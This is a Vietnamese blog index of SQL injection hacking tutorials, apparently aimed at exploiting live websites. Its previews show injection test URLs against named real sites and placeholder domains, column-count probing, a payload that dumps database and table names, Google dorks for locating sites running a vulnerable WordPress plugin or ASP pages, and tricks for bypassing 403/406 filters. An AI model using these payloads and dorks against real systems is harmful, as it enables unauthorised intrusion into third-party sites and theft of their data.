SQLI dạng Bypass "Illegal mix of collations"
SQLI dạng Bypass "Illegal mix of collations"

Ví dụ ta có site: http://www.xyz.com Bước 1: Check lỗi Thêm dấu ‘ sau đường link có dạng id= http://www.xyz.com/news_dett.php?id=...

Đọc thêm »

SQLi dùng cách Post data
SQLi dùng cách Post data

Bước 1: Check lỗi http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206'  Giao diện website có thay...

Đọc thêm »

SQL Injection bypass show all (database,table_name,columns)
SQL Injection bypass show all (database,table_name,columns)

(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.schemata)where (0x00) in (@x:=concat(@x,0x3c62723e,schema_name)))...

Đọc thêm »

Tut SQLi dạng Bypass Encode
Tut SQLi dạng Bypass Encode

Site: http://www.sosia.biz/list-en.php?categoria_sel=2 Bước 1: Tìm lỗi http://www.sosia.biz/list-en.php?categoria_sel=2' Giao...

Đọc thêm »

Login Admin cp khi ko thể decode mã MD5
Login Admin cp khi ko thể decode mã MD5

Login Admin cp khi ko thể decode mã MD5

Đọc thêm »

Bypass 403 + Filter
Bypass 403 + Filter

Site : http://site.com/showpage.php?pid=3 Ta order by để tìm số column http://site.com/showpage.php?pid=3+group+by+1   =>> bì...

Đọc thêm »

Thêm code HTML vào SQLi
Thêm code HTML vào SQLi

Trong hướng dẫn này mình sẽ chỉ cho bạn cách để thêm các thẻ HTML đơn giản và cách thiết kế trong các truy vấn SQL Injection của bạn 1. Th...

Đọc thêm »

Các khái niệm về câu lệnh SQLI
Các khái niệm về câu lệnh SQLI

UNION UNION được sử dụng để nối thêm querry SQL injection  đến một truy vấn hợp pháp và kết hợp các thông tin chúng ta muốn lấy với các tr...

Đọc thêm »

[Chap 9] Blind SQL Injection
[Chap 9] Blind SQL Injection

1. Check lỗi www.site.com/news.php?id=1 and 1=1      * bình thường www.site.com/news.php?id=1 and 1=2      * giao diện site thay đổi...

Đọc thêm »

[Chap 8] Double query injection
[Chap 8] Double query injection

- Check lỗi http://www.site.com/index.php?id=1 order by 100--+-     * Error http://www.site.com/index.php?id=1 order by 1--+-        ...

Đọc thêm »

Khai thác lỗi SQL Injection trên plugin hd-webplayer của wordpress
Khai thác lỗi SQL Injection trên plugin hd-webplayer của wordpress

# Dork 1 (config.php) inurl:"/wp-content/plugins/hd-webplayer/config.php?id=" # Dork 2 (playlist.php) inurl:"/wp-content/...

Đọc thêm »

[Chap 7] Error based injection
[Chap 7] Error based injection

Bạn có thể sử dụng phương pháp này khi bạn nhận được thông báo lỗi như: Error #1604 The Used Select Statements Have A Different Number Of...

Đọc thêm »

[Chap 6] String Based SQL Injection
[Chap 6] String Based SQL Injection

Đây là một trong những kiểu khai thác SQLi đơn giản. Nó cũng gần tương tự với SQLi Basic, tuy nhiên nó khác với SQLi basic là khi khai t...

Đọc thêm »

[Chap 5]  Bypass 406 Not Acceptable
[Chap 5] Bypass 406 Not Acceptable

Bước 1: Check lỗi Thêm dấu ‘ vào sau con số của đường link có dạng id=  http://www.domain.com/index.php?do=content&id=1' Nếu ...

Đọc thêm »

[Chap 4] Khai thác lỗi Aspx
[Chap 4] Khai thác lỗi Aspx

Bước 1: Check link lỗi ví dụ:  http://domain.com/ProductDetail.aspx?MaSP=42’ Đối với site aspx, ta thêm dấu  ‘ cuối đường link có các ký...

Đọc thêm »

[Chap 3] Khai thác lỗi Jet
[Chap 3] Khai thác lỗi Jet

Một số dork dùng để tìm site dính lỗ hổng bảo mật Jet: tintuc.asp?tin_ID= chitiet.asp?ID= Bước 1: Check lỗi Thêm dấu’ vào cuối...

Đọc thêm »

[Chap 2] Khai thác SQLi lỗi dạng cơ bản
[Chap 2] Khai thác SQLi lỗi dạng cơ bản

Đối với dạng cơ bản thì ta sẽ khai thác đối với các link site kết thúc có dạng: id= category= decl_id= num= sanpham= product= và c...

Đọc thêm »
 
Top